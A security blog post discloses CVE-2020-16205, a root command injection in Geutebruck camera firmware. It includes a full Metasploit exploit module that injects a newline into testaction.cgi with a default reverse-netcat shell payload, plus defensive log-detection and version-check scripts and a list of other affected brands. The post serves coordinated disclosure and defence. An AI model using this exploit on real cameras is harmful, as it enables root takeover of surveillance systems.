Abstract
Those who follow our blog know that we like Geutebruck cameras: we have found many trivial RCEs in their products since 2016.
A few months ago we found a new one. These new attack vectors / vulnerabilities affect firmware versions 1.12.0.25 and prior, as well as the limited versions 1.12.13.2 and 1.12.14.5, of the following Encoder and E2 Series Camera models:
G-Code:
- EEC-2xxx
G-Cam:
- EBC-21xx
- EFD-22xx
- ETHC-22xx
- EWPC-22xx
As before, we chose to responsibly disclose this 0day vulnerability directly to Geutebruck and the ICS-CERT (Industrial Control Systems Cyber Emergency Response Team). Since then a new firmware (1.12.0.27) has been released to fix it, ICS-CERT has released an advisory and one CVE (CVE-2020-16205) has been assigned.
Many thanks to Geutebruck and ICS-CERT teams.
Advisory
https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
Exploit
This time we wrote a quick and dirty Metasploit module with a check feature that tells you whether your camera is vulnerable.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability. The
        vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
        authenticated user to execute arbitrary commands with root privileges.
        Firmware versions <= 1.12.14.5 are affected.
        Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
      },
      'Author'         =>
        [
          'Davy Douhine'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2020-16205' ],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ]
        ],
      'DisclosureDate' => 'May 20 2020',
      'Privileged'     => true,
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_ARMLE],
      'Targets'        => [
        [ 'Automatic Target', { } ]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        }
    ))

    register_options(
      [
        OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
        OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
      ], self.class)
  end

  # Quick check: fetch /brand.xml and look for the exact firmware version the
  # module was tested against. Other affected versions are not matched here.
  def check
    begin
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => '/brand.xml',
        'query'  => "",
      )
      if res && res.body.include?("1.12.14.5")
        return CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      return CheckCode::Unknown
    end

    CheckCode::Safe
  end

  def exploit
    # Credentials are read from the datastore but are not used in the raw request below.
    user = datastore['HttpUsername']
    pass = datastore['HttpPassword']

    # The injection point is the "server" parameter: a newline (%0a) terminates
    # the expected NTP server value and the encoded payload follows it.
    header = "type=ntp&server=%0a"
    uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all")

    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    res = send_request_raw(
      {
        'method' => 'GET',
        'uri'    => uri
      })
  end
end
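For defenders, the same request shape the module sends is easy to spot in the camera's web server logs: a request to testaction.cgi whose query string carries a percent-encoded newline or carriage return. The following Ruby script is an added example written for this post, not part of the module above or of any Geutebruck software. It assumes combined-format access log lines (the sample lines are constructed, with placeholder addresses and a placeholder in place of any payload) and flags the ones that match that pattern.

```ruby
require 'cgi'

# Paths named in the post: the module's default TARGETURI and the path in its description.
TESTACTION_PATHS = ['/uapi-cgi/testaction.cgi', '/uapi-cgi/admin/testaction.cgi'].freeze

# Extract the request target from a combined-format access log line (assumed format).
LOG_RE = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/

# True when the target is testaction.cgi and any query value, once percent-decoded,
# contains a newline or carriage return: the primitive the module relies on (server=%0a...).
def suspicious_request?(target)
  path, query = target.split('?', 2)
  return false unless TESTACTION_PATHS.include?(path)
  return false if query.nil?

  CGI.parse(query).values.flatten.any? { |value| value.match?(/[\r\n]/) }
end

# Return the subset of log lines that look like exploitation attempts.
def flag_exploit_attempts(log_lines)
  log_lines.select do |line|
    m = LOG_RE.match(line)
    m && suspicious_request?(m[:target])
  end
end

# Constructed sample log (not from a real camera); 10.0.0.x addresses and
# PAYLOAD_PLACEHOLDER are placeholders.
SAMPLE_LOG = [
  '10.0.0.20 - - [20/May/2020:10:00:01 +0000] "GET /brand.xml HTTP/1.1" 200 512',
  '10.0.0.20 - - [20/May/2020:10:00:02 +0000] "GET /uapi-cgi/admin/testaction.cgi?type=ntp&server=pool.ntp.org HTTP/1.1" 200 88',
  '10.0.0.99 - - [20/May/2020:10:00:03 +0000] "GET /uapi-cgi/admin/testaction.cgi?type=ntp&server=%0aPAYLOAD_PLACEHOLDER HTTP/1.1" 200 88',
  '10.0.0.99 - - [20/May/2020:10:00:04 +0000] "GET /uapi-cgi/testaction.cgi?type=ntp&server=10.0.0.5%0d%0aPAYLOAD_PLACEHOLDER HTTP/1.1" 200 88'
].freeze

if __FILE__ == $PROGRAM_NAME
  flag_exploit_attempts(SAMPLE_LOG).each { |line| puts "ALERT: #{line}" }
end
```

The decoding step matters: matching the literal string `%0a` would miss mixed-case encodings such as `%0A`, while decoding first and checking for the control character catches every spelling. A legitimate NTP test request (second sample line) is not flagged.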
Mitigation
Geutebruck has released a new software version, 1.12.0.27, to address the identified vulnerability, which is available at the following location (registration needed):
http://www.geutebrueck.com/en_EN/login.html
If an update is not possible right now, users can in the meantime disable the “Enable anonymous access” option to mitigate the risk. The RCE will remain but will only be reachable by authenticated users.
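The module's check only matches the single version string it was tested on, so a fleet inventory based on it would miss the other affected firmware. The following Ruby script is an added example for this post, not code from the module or from Geutebruck: it encodes the advisory's affected set as stated above (1.12.0.25 and prior, plus the limited versions 1.12.13.2 and 1.12.14.5; fixed in 1.12.0.27) and reports whether a camera needs the update or the anonymous-access mitigation. The brand.xml layout is not documented in the post; like the module, the script only assumes the body contains the dotted version string, and the sample body is constructed.

```ruby
# Affected versions per the ICS-CERT advisory quoted in the post.
LAST_AFFECTED_MAINLINE = '1.12.0.25'
AFFECTED_LIMITED       = ['1.12.13.2', '1.12.14.5'].freeze
FIXED_VERSION          = '1.12.0.27'

# Four-part dotted version, e.g. 1.12.14.5 (assumption: brand.xml carries it in this form).
VERSION_RE = /\b(\d+(?:\.\d+){3})\b/

# Split "1.12.0.25" into [1, 12, 0, 25] so versions compare numerically, not as strings.
def version_parts(version)
  version.split('.').map(&:to_i)
end

# True when the version is 1.12.0.25 or earlier, or one of the limited affected versions.
def affected_firmware?(version)
  return true if AFFECTED_LIMITED.include?(version)

  (version_parts(version) <=> version_parts(LAST_AFFECTED_MAINLINE)) <= 0
end

# Pull the version string out of a brand.xml body; nil if none is present.
def version_from_brand_xml(body)
  m = VERSION_RE.match(body)
  m && m[1]
end

# Human-readable verdict for one camera, given its brand.xml body.
def assess_camera(body)
  version = version_from_brand_xml(body)
  return 'unknown (no version string in brand.xml)' if version.nil?

  if affected_firmware?(version)
    "affected (#{version}): update to #{FIXED_VERSION} or disable anonymous access meanwhile"
  else
    "not affected (#{version})"
  end
end

# Constructed sample body; element names are assumed, not taken from a real camera.
SAMPLE_BRAND_XML = '<brand><model>G-Cam/EFD-2250</model><firmware>1.12.14.5</firmware></brand>'

if __FILE__ == $PROGRAM_NAME
  puts assess_camera(SAMPLE_BRAND_XML)
end
```

Comparing integer arrays rather than strings is what makes `1.12.0.9` sort below `1.12.0.25`; a plain string comparison would get that wrong. Versions the advisory does not list (for example a later limited build) are reported as not affected, so treat that verdict as "not in the advisory" rather than as a guarantee.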
In the wild
Many brands use the same firmware (and are vulnerable too):
- UDP Technology (which is also the supplier of the firmware for the other vendors)
- Ganz
- Visualint
- Cap
- THRIVE Intelligence
- Sophus
- VCA
- TripCorps
- Sprinx Technologies
- Smartec
- Riva